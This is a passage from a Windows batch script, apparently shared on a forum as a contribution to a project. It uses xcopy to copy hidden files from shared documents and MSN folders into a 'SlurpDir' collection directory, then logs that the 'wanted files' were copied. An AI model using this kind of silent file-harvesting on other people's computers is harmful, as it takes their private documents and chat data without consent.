     xcopy "%ALLUSERSPROFILE%\%ShDoc%\%%a" "%SlurpDir%\%ShDoc%\" /H /S /D /C
     xcopy "%HOMEDRIVE%%HOMEPATH%\%MSN%\%%a" "%SlurpDir%\%MSN%\" /H /S /D /C
     )
     ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
     ECHO +----------------------------------+ >> %log% 2>&1
     ECHO + [Wanted files were copied] + >> %log% 2>&1
     ECHO +----------------------------------+ >> %log% 2>&1
     pause
     :SkipSlurp3

     This was my little contribution to this project, I hope it helps!